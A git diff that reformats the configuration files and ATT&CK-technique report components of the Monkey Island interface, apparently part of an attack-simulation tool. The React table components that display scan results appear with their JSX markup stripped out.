+++ b/monkey/monkey_island/cc/services/version_update.py
@@ -54,4 +54,3 @@ class VersionUpdateService:
 @staticmethod
 def get_download_link():
 return VersionUpdateService.VERSION_SERVER_DOWNLOAD_URL % (env.get_deployment(), env.get_version())
-
diff --git a/monkey/monkey_island/cc/services/wmi_handler.py b/monkey/monkey_island/cc/services/wmi_handler.py
index 2522b42dd..a802aabf1 100644
--- a/monkey/monkey_island/cc/services/wmi_handler.py
+++ b/monkey/monkey_island/cc/services/wmi_handler.py
@@ -5,7 +5,6 @@ __author__ = 'maor.rayzin'
 class WMIHandler(object):
-
 ADMINISTRATORS_GROUP_KNOWN_SID = '1-5-32-544'
 def __init__(self, monkey_id, wmi_info, user_secrets):
@@ -160,4 +159,3 @@ class WMIHandler(object):
 {'type': USERTYPE, 'entities_list': 1})
 if entity_details.get('type') == GROUPTYPE:
 self.add_admin(entity_details, machine_id)
-
diff --git a/monkey/monkey_island/cc/ui/.babelrc b/monkey/monkey_island/cc/ui/.babelrc
index 31130e826..7c92bc8e1 100644
--- a/monkey/monkey_island/cc/ui/.babelrc
+++ b/monkey/monkey_island/cc/ui/.babelrc
@@ -1,4 +1,10 @@
 {
- "presets": ["es2015", "stage-0", "react"],
- "plugins": ["emotion"]
+ "presets": [
+ "es2015",
+ "stage-0",
+ "react"
+ ],
+ "plugins": [
+ "emotion"
+ ]
 }
diff --git a/monkey/monkey_island/cc/ui/.eslintrc b/monkey/monkey_island/cc/ui/.eslintrc
index b542daaf7..6b5cd85f9 100644
--- a/monkey/monkey_island/cc/ui/.eslintrc
+++ b/monkey/monkey_island/cc/ui/.eslintrc
@@ -19,14 +19,22 @@
 },
 "rules": {
 "comma-dangle": 1,
- "quotes": [ 1, "single" ],
+ "quotes": [
+ 1,
+ "single"
+ ],
 "no-undef": 1,
 "global-strict": 0,
 "no-extra-semi": 1,
 "no-underscore-dangle": 0,
 "no-console": 1,
 "no-unused-vars": 1,
- "no-trailing-spaces": [1, { "skipBlankLines": true }],
+ "no-trailing-spaces": [
+ 1,
+ {
+ "skipBlankLines": true
+ }
+ ],
 "no-unreachable": 1,
 "no-alert": 0,
 "react/jsx-uses-react": 1,
diff --git a/monkey/monkey_island/cc/ui/karma.conf.js b/monkey/monkey_island/cc/ui/karma.conf.js
index 87401bfe6..660cb8128 100644
--- a/monkey/monkey_island/cc/ui/karma.conf.js
+++ b/monkey/monkey_island/cc/ui/karma.conf.js @@ -3,23 +3,23 @@ var webpackCfg = require('./webpack.config'); // Set node environment to testing process.env.NODE_ENV = 'test'; -module.exports = function(config) { +module.exports = function (config) { config.set({ basePath: '', - browsers: [ 'PhantomJS' ], + browsers: ['PhantomJS'], files: [ 'test/loadtests.js' ], port: 8000, captureTimeout: 60000, - frameworks: [ 'mocha', 'chai' ], + frameworks: ['mocha', 'chai'], client: { mocha: {} }, singleRun: true, - reporters: [ 'mocha', 'coverage' ], + reporters: ['mocha', 'coverage'], preprocessors: { - 'test/loadtests.js': [ 'webpack', 'sourcemap' ] + 'test/loadtests.js': ['webpack', 'sourcemap'] }, webpack: webpackCfg, webpackServer: { @@ -28,8 +28,8 @@ module.exports = function(config) { coverageReporter: { dir: 'coverage/', reporters: [ - { type: 'html' }, - { type: 'text' } + {type: 'html'}, + {type: 'text'} ] } }); diff --git a/monkey/monkey_island/cc/ui/server.js b/monkey/monkey_island/cc/ui/server.js index ec9182cde..49045359e 100644 --- a/monkey/monkey_island/cc/ui/server.js +++ b/monkey/monkey_island/cc/ui/server.js 
@@ -14,19 +14,19 @@ let isInitialCompilation = true; const compiler = webpack(config); new WebpackDevServer(compiler, config.devServer) -.listen(config.port, 'localhost', (err) => { - if (err) { - console.log(err); - } - console.log('Listening at localhost:' + config.port); -}); + .listen(config.port, 'localhost', (err) => { + if (err) { + console.log(err); + } + console.log('Listening at localhost:' + config.port); + }); compiler.plugin('done', () => { if (isInitialCompilation) { // Ensures that we log after webpack printed its stats (is there a better way?) setTimeout(() => { console.log('\n✓ The bundle is now ready for serving!\n'); - console.log(' Open in iframe mode:\t\x1b[33m%s\x1b[0m', 'http://localhost:' + config.port + '/webpack-dev-server/'); + console.log(' Open in iframe mode:\t\x1b[33m%s\x1b[0m', 'http://localhost:' + config.port + '/webpack-dev-server/'); console.log(' Open in inline mode:\t\x1b[33m%s\x1b[0m', 'http://localhost:' + config.port + '/\n'); console.log(' \x1b[33mHMR is active\x1b[0m. The bundle will automatically rebuild and live-update on changes.') }, 350); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/MatrixComponent.js b/monkey/monkey_island/cc/ui/src/components/attack/MatrixComponent.js index 2e7ef4fc3..640032767 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/MatrixComponent.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/MatrixComponent.js @@ -14,10 +14,10 @@ class MatrixComponent extends AuthComponent { }; // Finds which attack type has most techniques and returns that number - static findMaxTechniques(data){ + static findMaxTechniques(data) { let maxLen = 0; - data.forEach(function(techType) { - if (Object.keys(techType.properties).length > maxLen){ + data.forEach(function (techType) { + if (Object.keys(techType.properties).length > maxLen) { maxLen = Object.keys(techType.properties).length } }); 
@@ -25,18 +25,18 @@ class MatrixComponent extends AuthComponent { }; // Parses ATT&CK config schema into data suitable for react-table (ATT&CK matrix) - static parseTechniques (data, maxLen) { + static parseTechniques(data, maxLen) { let techniques = []; // Create rows with attack techniques for (let i = 0; i < maxLen; i++) { let row = {}; - data.forEach(function(techType){ + data.forEach(function (techType) { let rowColumn = {}; rowColumn.techName = techType.title; if (i <= Object.keys(techType.properties).length) { rowColumn.technique = Object.values(techType.properties)[i]; - if (rowColumn.technique){ + if (rowColumn.technique) { rowColumn.technique.name = Object.keys(techType.properties)[i] } } else { @@ -50,28 +50,28 @@ class MatrixComponent extends AuthComponent { }; getColumns(matrixData) { - return Object.keys(matrixData[0]).map((key)=>{ + return Object.keys(matrixData[0]).map((key) => { return { Header: key, id: key, accessor: x => this.renderTechnique(x[key].technique), - style: { 'whiteSpace': 'unset' } + style: {'whiteSpace': 'unset'} }; }); } renderTechnique(technique) { - if (technique == null){ - return (
) + if (technique == null) { + return (
) } else { return ( - - {technique.title} - - ) + + {technique.title} + + ) } }; @@ -85,20 +85,20 @@ class MatrixComponent extends AuthComponent { renderLegend = () => { return ( - ) + ) }; render() { @@ -110,7 +110,7 @@ class MatrixComponent extends AuthComponent { + defaultPageSize={tableData['maxTechniques']}/>
); } diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js index 4d4f55dad..7b7215db0 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js 
@@ -1,57 +1,62 @@ import React from "react"; -export function renderMachine(val){ - return ( - {val.ip_addr} {(val.domain_name ? " (".concat(val.domain_name, ")") : "")} - ) +export function renderMachine(val) { + return ( + {val.ip_addr} {(val.domain_name ? " (".concat(val.domain_name, ")") : "")} + ) } /* Function takes data gathered from system info collector and creates a string representation of machine from that data. */ export function renderMachineFromSystemData(data) { - let machineStr = data['hostname'] + " ( "; - data['ips'].forEach(function(ipInfo){ - if(typeof ipInfo === "object"){ - machineStr += ipInfo['addr'] + ", "; - } else { - machineStr += ipInfo + ", "; - } - }); - // Replaces " ," with " )" to finish a list of IP's - return machineStr.slice(0, -2) + " )" + let machineStr = data['hostname'] + " ( "; + data['ips'].forEach(function (ipInfo) { + if (typeof ipInfo === "object") { + machineStr += ipInfo['addr'] + ", "; + } else { + machineStr += ipInfo + ", "; + } + }); + // Replaces " ," with " )" to finish a list of IP's + return machineStr.slice(0, -2) + " )" } /* Formats telemetry data that contains _id.machine and _id.usage fields into columns for react table. */ export function getUsageColumns() { - return ([{ - columns: [ - {Header: 'Machine', - id: 'machine', - accessor: x => renderMachineFromSystemData(x.machine), - style: { 'whiteSpace': 'unset' }, - width: 300}, - {Header: 'Usage', - id: 'usage', - accessor: x => x.usage, - style: { 'whiteSpace': 'unset' }}] - }])} + return ([{ + columns: [ + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'}, + width: 300 + }, + { + Header: 'Usage', + id: 'usage', + accessor: x => x.usage, + style: {'whiteSpace': 'unset'} + }] + }]) +} /* Renders table fields that contains 'used' boolean value and 'name' string value. 'Used' value determines if 'name' value will be shown. 
*/ -export function renderUsageFields(usages){ - let output = []; - usages.forEach(function(usage){ - if(usage['used']){ - output.push(
{usage['name']}
) - } - }); - return (
{output}
); - } +export function renderUsageFields(usages) { + let output = []; + usages.forEach(function (usage) { + if (usage['used']) { + output.push(
{usage['name']}
) + } + }); + return (
{output}
); +} export const ScanStatus = { - UNSCANNED: 0, - SCANNED: 1, - USED: 2 + UNSCANNED: 0, + SCANNED: 1, + USED: 2 }; diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1003.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1003.js index 24d742c14..ccebd3e7c 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1003.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1003.js @@ -17,7 +17,8 @@ class T1003 extends React.Component {
{this.props.data.message}

{this.props.data.status === ScanStatus.USED ? - + : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1005.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1005.js index 6d46c2285..799b91d08 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1005.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1005.js @@ -13,10 +13,17 @@ class T1005 extends React.Component { return ([{ Header: "Sensitive data", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Type', id: 'type', accessor: x => x.gathered_data_type, style: { 'whiteSpace': 'unset' }}, - {Header: 'Info', id: 'info', accessor: x => x.info, style: { 'whiteSpace': 'unset' }}, - ]}])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'} + }, + {Header: 'Type', id: 'type', accessor: x => x.gathered_data_type, style: {'whiteSpace': 'unset'}}, + {Header: 'Info', id: 'info', accessor: x => x.info, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -25,10 +32,10 @@ class T1005 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1016.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1016.js index 63e2bb4a5..c5a02a8f7 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1016.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1016.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, renderUsageFields, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, renderUsageFields, ScanStatus} from "./Helpers" class T1016 extends React.Component { @@ -14,10 +14,16 @@ class T1016 extends React.Component { return ([{ Header: "Network configuration info gathered", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Network info', id: 'info', accessor: x => renderUsageFields(x.info), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'} + }, + {Header: 'Network info', id: 'info', accessor: x => renderUsageFields(x.info), style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -26,10 +32,10 @@ class T1016 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1018.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1018.js index dcf7687db..e54f4c89c 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1018.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1018.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, renderMachine, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, renderMachine, ScanStatus} from "./Helpers" class T1018 extends React.Component { @@ -10,9 +10,9 @@ class T1018 extends React.Component { super(props); } - static renderMachines(machines){ + static renderMachines(machines) { let output = []; - machines.forEach(function(machine){ + machines.forEach(function (machine) { output.push(renderMachine(machine)) }); return (
{output}
); @@ -21,12 +21,23 @@ class T1018 extends React.Component { static getScanInfoColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.monkey), style: { 'whiteSpace': 'unset' }}, - {Header: 'First scan', id: 'started', accessor: x => x.started, style: { 'whiteSpace': 'unset' }}, - {Header: 'Last scan', id: 'finished', accessor: x => x.finished, style: { 'whiteSpace': 'unset' }}, - {Header: 'Systems found', id: 'systems', accessor: x => T1018.renderMachines(x.machines), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.monkey), + style: {'whiteSpace': 'unset'} + }, + {Header: 'First scan', id: 'started', accessor: x => x.started, style: {'whiteSpace': 'unset'}}, + {Header: 'Last scan', id: 'finished', accessor: x => x.finished, style: {'whiteSpace': 'unset'}}, + { + Header: 'Systems found', + id: 'systems', + accessor: x => T1018.renderMachines(x.machines), + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; render() { return ( @@ -35,10 +46,10 @@ class T1018 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1021.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1021.js index ce8688af1..e9b21d7f4 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1021.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1021.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1021 extends React.Component { @@ -13,12 +13,20 @@ class T1021 extends React.Component { static getServiceColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), - style: { 'whiteSpace': 'unset' }, width: 160}, - {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: { 'whiteSpace': 'unset' }, width: 100}, - {Header: 'Valid account used', id: 'credentials', accessor: x => this.renderCreds(x.successful_creds), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), + style: {'whiteSpace': 'unset'}, width: 160 + }, + {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: {'whiteSpace': 'unset'}, width: 100}, + { + Header: 'Valid account used', + id: 'credentials', + accessor: x => this.renderCreds(x.successful_creds), + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; static renderCreds(creds) { return {creds.map(cred =>
{cred}
)}
diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1035.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1035.js index 7345ca497..b95b6bb45 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1035.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1035.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { getUsageColumns } from "./Helpers" +import {getUsageColumns} from "./Helpers" class T1035 extends React.Component { @@ -17,10 +17,10 @@ class T1035 extends React.Component {
{this.props.data.services.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1041.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1041.js index 3d6b45d08..9749186fe 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1041.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1041.js @@ -13,9 +13,11 @@ class T1041 extends React.Component { return ([{ Header: "Data exfiltration channels", columns: [ - {Header: 'Source', id: 'src', accessor: x => x.src, style: { 'whiteSpace': 'unset' }}, - {Header: 'Destination', id: 'dst', accessor: x => x.dst, style: { 'whiteSpace': 'unset' }} - ]}])}; + {Header: 'Source', id: 'src', accessor: x => x.src, style: {'whiteSpace': 'unset'}}, + {Header: 'Destination', id: 'dst', accessor: x => x.dst, style: {'whiteSpace': 'unset'}} + ] + }]) + }; render() { return ( @@ -24,10 +26,10 @@ class T1041 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1059.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1059.js index 4651f5c41..ba886b6c7 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1059.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1059.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1059 extends React.Component { @@ -14,11 +14,18 @@ class T1059 extends React.Component { return ([{ Header: 'Example commands used', columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.data.machine), style: { 'whiteSpace': 'unset'}, width: 160 }, - {Header: 'Approx. Time', id: 'time', accessor: x => x.data.info.finished, style: { 'whiteSpace': 'unset' }}, - {Header: 'Command', id: 'command', accessor: x => x.data.info.executed_cmds.cmd, style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachine(x.data.machine), + style: {'whiteSpace': 'unset'}, + width: 160 + }, + {Header: 'Approx. Time', id: 'time', accessor: x => x.data.info.finished, style: {'whiteSpace': 'unset'}}, + {Header: 'Command', id: 'command', accessor: x => x.data.info.executed_cmds.cmd, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -27,10 +34,10 @@ class T1059 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1064.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1064.js index f57abd4b8..27b099f82 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1064.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1064.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { getUsageColumns } from "./Helpers" +import {getUsageColumns} from "./Helpers" class T1064 extends React.Component { @@ -17,10 +17,10 @@ class T1064 extends React.Component {
{this.props.data.scripts.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1075.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1075.js index 3cd12560b..db2bb943a 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1075.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1075.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1075 extends React.Component { @@ -11,10 +11,10 @@ class T1075 extends React.Component { this.props.data.successful_logins.forEach((login) => this.setLoginHashType(login)) } - setLoginHashType(login){ - if(login.attempts[0].ntlm_hash !== ""){ + setLoginHashType(login) { + if (login.attempts[0].ntlm_hash !== "") { login.attempts[0].hashType = 'NTLM'; - } else if(login.attempts[0].lm_hash !== ""){ + } else if (login.attempts[0].lm_hash !== "") { login.attempts[0].hashType = 'LM'; } } 
@@ -22,12 +22,13 @@ class T1075 extends React.Component { static getHashColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: { 'whiteSpace': 'unset' }}, - {Header: 'Username', id: 'username', accessor: x => x.attempts[0].user, style: { 'whiteSpace': 'unset' }}, - {Header: 'Hash type', id: 'hash', accessor: x => x.attempts[0].hashType, style: { 'whiteSpace': 'unset' }}, - ] - }])}; + {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), style: {'whiteSpace': 'unset'}}, + {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: {'whiteSpace': 'unset'}}, + {Header: 'Username', id: 'username', accessor: x => x.attempts[0].user, style: {'whiteSpace': 'unset'}}, + {Header: 'Hash type', id: 'hash', accessor: x => x.attempts[0].hashType, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -36,10 +37,10 @@ class T1075 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1082.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1082.js index 8570ab1b0..1e04f9da8 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1082.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1082.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, renderUsageFields, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, renderUsageFields, ScanStatus} from "./Helpers" class T1082 extends React.Component { @@ -13,10 +13,16 @@ class T1082 extends React.Component { static getSystemInfoColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Gathered info', id: 'info', accessor: x => renderUsageFields(x.collections), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'} + }, + {Header: 'Gathered info', id: 'info', accessor: x => renderUsageFields(x.collections), style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -25,10 +31,10 @@ class T1082 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1086.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1086.js index db75d8dda..faeff7862 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1086.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1086.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1086 extends React.Component { @@ -14,11 +14,18 @@ class T1086 extends React.Component { return ([{ Header: 'Example Powershell commands used', columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.data[0].machine), style: { 'whiteSpace': 'unset'}, width: 160 }, - {Header: 'Approx. Time', id: 'time', accessor: x => x.data[0].info.finished, style: { 'whiteSpace': 'unset' }}, - {Header: 'Command', id: 'command', accessor: x => x.data[0].info.executed_cmds[0].cmd, style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachine(x.data[0].machine), + style: {'whiteSpace': 'unset'}, + width: 160 + }, + {Header: 'Approx. Time', id: 'time', accessor: x => x.data[0].info.finished, style: {'whiteSpace': 'unset'}}, + {Header: 'Command', id: 'command', accessor: x => x.data[0].info.executed_cmds[0].cmd, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -27,10 +34,10 @@ class T1086 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1090.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1090.js index 934e76694..8aa0de2c2 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1090.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1090.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, ScanStatus} from "./Helpers" class T1090 extends React.Component { @@ -13,10 +13,13 @@ class T1090 extends React.Component { static getProxyColumns() { return ([{ columns: [ - {Header: 'Machines', + { + Header: 'Machines', id: 'machine', accessor: x => renderMachineFromSystemData(x), - style: { 'whiteSpace': 'unset', textAlign: 'center' }}]}]) + style: {'whiteSpace': 'unset', textAlign: 'center'} + }] + }]) }; render() { @@ -26,10 +29,10 @@ class T1090 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js index 8acd48c4b..d1df0e9e6 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { ScanStatus } from "./Helpers" +import {ScanStatus} from "./Helpers" class T1105 extends React.Component { @@ -14,11 +14,12 @@ class T1105 extends React.Component { return ([{ Header: 'Files copied', columns: [ - {Header: 'Src. Machine', id: 'srcMachine', accessor: x => x.src, style: { 'whiteSpace': 'unset'}, width: 170 }, - {Header: 'Dst. Machine', id: 'dstMachine', accessor: x => x.dst, style: { 'whiteSpace': 'unset'}, width: 170}, - {Header: 'Filename', id: 'filename', accessor: x => x.filename, style: { 'whiteSpace': 'unset'}}, - ] - }])}; + {Header: 'Src. Machine', id: 'srcMachine', accessor: x => x.src, style: {'whiteSpace': 'unset'}, width: 170}, + {Header: 'Dst. Machine', id: 'dstMachine', accessor: x => x.dst, style: {'whiteSpace': 'unset'}, width: 170}, + {Header: 'Filename', id: 'filename', accessor: x => x.filename, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -27,10 +28,10 @@ class T1105 extends React.Component {
{this.props.data.status !== ScanStatus.UNSCANNED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1106.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1106.js index a3210b73c..febebb30d 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1106.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1106.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { getUsageColumns } from "./Helpers" +import {getUsageColumns} from "./Helpers" class T1106 extends React.Component { @@ -17,10 +17,10 @@ class T1106 extends React.Component {
{this.props.data.api_uses.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1107.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1107.js index d80dc3f0e..faabf95a2 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1107.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1107.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, ScanStatus} from "./Helpers" class T1107 extends React.Component { @@ -10,8 +10,8 @@ class T1107 extends React.Component { super(props); } - static renderDelete(status){ - if(status === ScanStatus.USED){ + static renderDelete(status) { + if (status === ScanStatus.USED) { return Yes } else { return No @@ -21,11 +21,19 @@ class T1107 extends React.Component { static getDeletedFileColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x._id.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Path', id: 'path', accessor: x => x._id.path, style: { 'whiteSpace': 'unset' }}, - {Header: 'Deleted?', id: 'deleted', accessor: x => this.renderDelete(x._id.status), - style: { 'whiteSpace': 'unset' }, width: 160}] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x._id.machine), + style: {'whiteSpace': 'unset'} + }, + {Header: 'Path', id: 'path', accessor: x => x._id.path, style: {'whiteSpace': 'unset'}}, + { + Header: 'Deleted?', id: 'deleted', accessor: x => this.renderDelete(x._id.status), + style: {'whiteSpace': 'unset'}, width: 160 + }] + }]) + }; render() { return ( @@ -34,10 +42,10 @@ class T1107 extends React.Component {
{this.props.data.deleted_files.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1110.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1110.js index da9682da3..475e79fed 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1110.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1110.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1110 extends React.Component { 
